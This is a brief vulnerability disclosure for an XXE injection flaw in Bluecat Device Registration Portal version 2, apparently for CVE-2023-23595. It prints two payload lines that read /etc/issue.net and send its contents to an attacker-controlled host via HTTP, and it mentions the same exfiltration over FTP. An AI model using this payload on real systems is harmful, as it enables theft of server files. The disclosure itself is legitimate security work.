Bluecat Device Registration Portal (Bluecat DRP) version 2 is vulnerable to information leakage via XML External Entity (XXE) injection.
Tested on version 2.2. Version 2 is no longer supported by the vendor.
I was only able to extract single-line files, /etc/issue.net for example. This appears to be a feature of Java 7 and above, per https://web.archive.org/web/20230113185834/https://stackoverflow.com/questions/58395997/xxe-unable-to-retrieve-files-with-multiple-lines
I was also able to exfiltrate single-line files via outbound FTP.
<!ENTITY % data SYSTEM "file:///etc/issue.net">
<!ENTITY % param1 "<!ENTITY extract SYSTEM 'http://vps2/?%data;'>">
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23595